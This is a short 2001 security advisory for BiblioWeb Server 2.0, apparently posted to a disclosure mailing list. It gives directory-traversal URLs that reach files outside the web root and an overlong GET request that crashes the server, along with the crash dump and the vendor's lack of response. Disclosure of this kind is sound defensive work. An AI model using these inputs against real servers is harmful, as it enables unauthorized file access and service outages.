To Ben Greenbaum:

    Please post this advisory instead of the last.  I needed to
make a minor change to the 'Vendor Status' section.  Thanks.

Vulnerabilities in BiblioWeb Server


BiblioWeb Server 2.0 is a web server available from  A vulnerability exists which allows a remote
user to break out of the web root using relative paths (ie: '..', '...').
A second vulnerability allows a remote attacker to crash the server.


To break out of the web root, use the following URLs:

        http://localhost/..\[file outside web root]
        http://localhost/...\[file outside web root]

To crash the server, telnet to port 80, and send:

        GET /[a lot of 'A's]

    The server crashes with the following dump:

BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
Stack dump:


No quick fix is possible.

    Vendor Status

CG Information was contacted via <[EMAIL PROTECTED]> on Monday,
January 29, 2001.  No reply was received.

        - Joe Testa  ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron

Reply via email to